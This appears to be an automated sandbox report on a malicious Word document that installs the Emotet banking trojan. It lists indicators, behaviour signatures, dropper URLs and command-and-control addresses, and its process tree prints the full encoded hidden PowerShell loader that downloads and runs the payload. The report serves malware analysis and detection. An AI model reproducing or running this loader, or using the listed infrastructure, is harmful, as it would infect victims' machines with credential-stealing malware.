Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    151s
  • resource
    win7v191014
  • submitted
    10-12-2019 18:05

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.63.doc

  • Sample

    191210-tre1ht8l26

  • SHA256

    ad99c5c6a1b25fb1aa7e3803d11623a74abb080990d3dfe1e684397b77b019af

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://bepeterson.futurismdemo.com/archive/y5o7/
exe.dropper

http://www.gnc.happenizedev.com/backup/n99uf/
exe.dropper

http://odoo-accounting.com/wp-includes/rest-api/search/R/
exe.dropper

http://monoclepetes.com/disneyworldclassroom/sy52j7/
exe.dropper

http://bakestories.com/0hikvh/Jm4QTsHwF/

Extracted

Family

emotet

C2

2.38.99.79:80

98.24.231.64:80

47.156.70.145:80

37.59.24.177:8080

66.34.201.20:7080

108.179.206.219:8080

45.56.88.91:443

206.189.112.148:8080

120.150.246.241:80

190.56.255.118:80

200.71.148.138:8080

192.241.255.77:8080

211.63.71.72:8080

190.53.135.159:21

183.102.238.69:465

108.191.2.72:80

107.170.24.125:8080

167.114.242.226:8080

91.73.197.90:80

178.209.71.63:8080
rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Modifies registry class 136 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.63.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    PID:1120
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABHAHgAZgB5AGcAaQBmAGIAcgBjAGQAPQAnAFMAcQBwAGoAdAB1AHAAZAB1AHAAeAAnADsAJABVAHkAcABkAGwAZQBpAHMAaAB1AGcAIAA9ACAAJwAxADYAMgAnADsAJABCAGcAYgB3AHcAbABjAGIAagB2AGcAaQA9ACcATABjAHcAbQBjAHcAbABzACcAOwAkAFIAYwBkAHQAaABnAGEAZQBwAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFUAeQBwAGQAbABlAGkAcwBoAHUAZwArACcALgBlAHgAZQAnADsAJABCAG0AYgBuAGwAaQBoAHQAYwBuAGUAdQBxAD0AJwBPAG0AcgBoAHUAYwBrAGgAbAAnADsAJABGAGYAaQB2AGQAdQBxAGkAdgBrAHMAZgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBjAGwASQBlAG4AdAA7ACQAUABhAGEAdABnAGUAagBhAHcAPQAnAGgAdAB0AHAAOgAvAC8AYgBlAHAAZQB0AGUAcgBzAG8AbgAuAGYAdQB0AHUAcgBpAHMAbQBkAGUAbQBvAC4AYwBvAG0ALwBhAHIAYwBoAGkAdgBlAC8AeQA1AG8ANwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGcAbgBjAC4AaABhAHAAcABlAG4AaQB6AGUAZABlAHYALgBjAG8AbQAvAGIAYQBjAGsAdQBwAC8AbgA5ADkAdQBmAC8AKgBoAHQAdABwADoALwAvAG8AZABvAG8ALQBhAGMAYwBvAHUAbgB0AGkAbgBnAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwByAGUAcwB0AC0AYQBwAGkALwBzAGUAYQByAGMAaAAvAFIALwAqAGgAdAB0AHAAOgAvAC8AbQBvAG4AbwBjAGwAZQBwAGUAdABlAHMALgBjAG8AbQAvAGQAaQBzAG4AZQB5AHcAbwByAGwAZABjAGwAYQBzAHMAcgBvAG8AbQAvAHMAeQA1ADIAagA3AC8AKgBoAHQAdABwADoALwAvAGIAYQBrAGUAcwB0AG8AcgBpAGUAcwAuAGMAbwBtAC8AMABoAGkAawB2AGgALwBKAG0ANABRAFQAcwBIAHcARgAvACcALgAiAFMAcABMAGAAaQBUACIAKAAnACoAJwApADsAJABTAGwAYgBpAGkAagBkAGMAdgBrAGsAcAA9ACcATgBtAGcAeQB6AHIAbABxACcAOwBmAG8AcgBlAGEAYwBoACgAJABJAG8AegByAG8AbgBuAGgAcQB5AGsAIABpAG4AIAAkAFAAYQBhAHQAZwBlAGoAYQB3ACkAewB0AHIAeQB7ACQARgBmAGkAdgBkAHUAcQBpAHYAawBzAGYALgAiAEQAYABvAHcAbgBgAEwATwBhAEQARgBJAEwARQAiACgAJABJAG8AegByAG8AbgBuAGgAcQB5AGsALAAgACQAUgBjAGQAdABoAGcAYQBlAHAAdQApADsAJABKAHUAawBpAHcAcQBlAHAAdgB0AHAAPQAnAFQAZgB1AHIAbwBrAHcAZQB4AGIAZwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQAUgBjAGQAdABoAGcAYQBlAHAAdQApAC4AIgBMAGAAZQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMwAyADAAMgA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgB0ACIAKAAkAFIAYwBkAHQAaABnAGEAZQBwAHUAKQA7ACQATQBhAGcAYwBmAG8AeQBvAHkAdgA9ACcARwB1AHQAeABsAHIAdQBtACcAOwBiAHIAZQBhAGsAOwAkAFoAdwBmAGoAaQBtAHMAZQBiAD0AJwBWAGQAdQBtAG4AcgBlAHYAcQB3AHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBrAGQAZAB1AHAAdgBxAHEAPQAnAEsAdwB2AGYAbAB2AHQAdAAnAA==
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:2004
    • C:\Users\Admin\162.exe
      "C:\Users\Admin\162.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:2024
      • C:\Users\Admin\162.exe
        --fb74438b
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:1156
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2597591398348209951629390757-20837680671281542962-272171816-1368649592-2099165143"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1984
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1288
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:640
      • C:\Windows\SysWOW64\chunkerfill.exe
        "C:\Windows\SysWOW64\chunkerfill.exe"
        1⤵
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        PID:1856
        • C:\Windows\SysWOW64\chunkerfill.exe
          --387a37f3
          2⤵
          • Suspicious use of SetWindowsHookEx
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          PID:1548

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1120-0-0x0000000006050000-0x0000000006054000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1120-1-0x00000000062C0000-0x00000000062C3000-memory.dmp

        Filesize

        12KB

        Download

      • memory/1120-2-0x00000000062B9000-0x00000000062BD000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1120-3-0x0000000008FA0000-0x0000000008FA4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1120-4-0x000000000626F000-0x0000000006273000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1120-5-0x000000000626F000-0x0000000006273000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1120-6-0x000000000626F000-0x0000000006273000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1156-12-0x0000000000400000-0x000000000047C000-memory.dmp

        Filesize

        496KB

        Download

      • memory/1156-11-0x00000000001D0000-0x00000000001E7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1548-17-0x0000000000400000-0x000000000047C000-memory.dmp

        Filesize

        496KB

        Download

      • memory/1856-14-0x0000000000350000-0x0000000000367000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2024-8-0x00000000002D0000-0x00000000002E7000-memory.dmp

        Filesize

        92KB

        Download